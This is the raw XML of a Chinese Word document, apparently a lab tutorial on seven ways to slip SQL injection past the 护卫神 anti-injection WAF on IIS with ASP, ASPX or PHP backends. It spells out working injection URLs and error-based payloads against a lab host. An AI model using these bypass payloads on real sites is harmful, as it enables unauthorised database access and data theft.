            <wp:docPr id="1" name="图片 1" descr="屏幕截图 2025-01-16 22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1-16 2245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0x02 WAF测试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护卫神SQL防注入的规则几年了基本都没有什么变化，先来一张拦截测试图：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7960" cy="2072640"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="2" name="图片 2" descr="屏幕截图 2025-01-16 224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1-16 22460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姿势一：%00截断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%00截断是上传漏洞中常用的一个非常经典的姿势，在SQL注入中，也可以用来Bypass。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在WAF层，接收参数id后，遇到%00截断，只获取到 id=1，无法获取到后面的有害参数输入；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在ASPX+MSSQL中，支持%00来代替空白字符，构造的SQL语句得以成功执行，获取数据。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http://192.168.204.132/sql.aspx?id=1%00and 1=2 union select 1,2,column_name from information_schema.columns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4150" cy="1268095"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="3" name="图片 3" descr="屏幕截图 2025-01-16 224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01-16 22470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在PHP+Mysql中，可以用/*%00*/，同样可以进行Bypass。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/sql.php?id=1/*%00*/union select 1,schema_name,3 from information_schema.schemata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姿势二：GET+POST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当同时提交GET、POST请求时，进入POST逻辑，而忽略了GET请求的有害参输入,可轻易Bypass。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在IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL 均适用。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http://192.168.204.132/sql.aspx?id=1 and 1=2 union select 1,column_name,3 from information_schema.columns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POST：aaa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0340" cy="1400810"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="4" name="图片 4" descr="屏幕截图 2025-01-16 224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01-16 2247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姿势三：unicode编码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IIS服务器支持对于unicode的解析，对关键词进行unicode编码绕过。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http://192.168.204.132/sql.aspx?id=1 and 1=2 union s%u0045lect 1,2,column_name from information_schema.columns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135" cy="1499235"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕截图 2025-01-16 224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5-01-16 2248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姿势四：ASPX+HPP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在ASPX中，有一个比较特殊的HPP特性，当GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序GET,POST,COOKIE，中间通过逗号链接 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UNION、SELECT、两个关键字拆分放在GET/POST的位置，通过ASPX的这个特性连起来，姿势利用有点局限，分享一下Bypass思路。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http://192.168.204.132/sql.aspx?id=1 and 1=2 union/*POST：id=*/select 1,column_name,3 from information_schema.columns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135" cy="1814830"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2025-01-16 22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5-01-16 2249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姿势五：ASP %特性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在IIS+ASP中，当我们输入un%ion，解析的时候会去掉%号，服务端接收的参数是union。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http://192.168.204.132/sql.asp?id=1 and 1=2 un%ion select 1,2,column_name from information_schema.columns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8595" cy="1168400"/>
            <wp:effectExtent l="0" t="0" r="8255" b="3175"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2025-01-16 224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5-01-16 2249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姿势六：缓冲区溢出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在PHP+Mysql中，使用POST 大包溢出的思路可成功Bypass。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http://192.168.204.132/sql.php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POST:id=1 and (select 1)=(Select 0xA*49099) union select 1,schema_name,3 from information_schema.SCHEMATA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编写一个简单的Python脚本，当A的个数填充到49099时，可成功Bypass。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2245" cy="3449320"/>
            <wp:effectExtent l="0" t="0" r="5080" b="8255"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2025-01-16 225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5-01-16 2250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姿势七：黑名单绕过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护士神SQL防注入，采用的是黑名单过滤，关键字并不全，比如只过滤union select，select from却放过了，那么这里就存在很多种绕过的形式。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基本上报错注入、盲注、延迟注入都可以很轻易Bypass，这时候直接利用SQLMAP，指定注入方式来获取数据。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4150" cy="1306195"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2025-01-16 225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01-16 22510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?id=1 or (select 1 from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(select count(),concat((concat(0x5e5e21,@@version,0x215e5e)),floor(rand(0)2))x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 from information_schema.tables group by x)a)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?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))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?id=1 and extractvalue(1, concat(0x5c, (select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VERSION() from information_schema.tables limit 1)))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="30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0x03 END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总结了几种IIS下SQL注入 Bypass的思路，在实战中也很常见。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打破基于OpenResty的WEB安全防护（CVE-2018-9230）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教学网址：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"https://www.anquanke.com/post/id/103771"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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>https://www.anquanke.com/post/id/103771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495F94"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2F495F94"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="3"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="575" w:hanging="575"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:pStyle w:val="4"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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">
    <w:nsid w:val="346D5638"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="346D5638"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="17"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="575" w:hanging="575"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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2">
    <w:nsid w:val="56FF1349"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="56FF1349"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:pStyle w:val="16"/>
      <w:lvlText w:val="第%1章"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="575" w:hanging="575"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="0"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体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3">
    <w:nsid w:val="6AB4A0A3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6AB4A0A3"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter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F65E02"/>
    <w:rsid w:val="2A5372A3"/>
    <w:rsid w:val="2BB95A14"/>
    <w:rsid w:val="407264AC"/>
    <w:rsid w:val="4E94011E"/>
    <w:rsid w:val="5CEF2DAC"/>
    <w:rsid w:val="5FEE2F32"/>
    <w:rsid w:val="61EA1473"/>
    <w:rsid w:val="63296519"/>
    <w:rsid w:val="6D501305"/>
    <w:rsid w:val="72A03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宋体" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0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Hyperlink"/>
    <w:basedOn w:val="13"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="样式6"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="0"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="17">
    <w:name w:val="样式7"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="0"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 1 Char"/>
    <w:link w:val="2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
      <w:kern w:val="44"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="3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126</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_11.1.0.10009_F1E327BC-269C-435d-A152-05C5408002CA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2024-09-16T06:28:00Z</dcterms:created>
  <dc:creator>漩涡凌风</dc:creator>
  <cp:lastModifiedBy>weichao</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-16T06:57:08Z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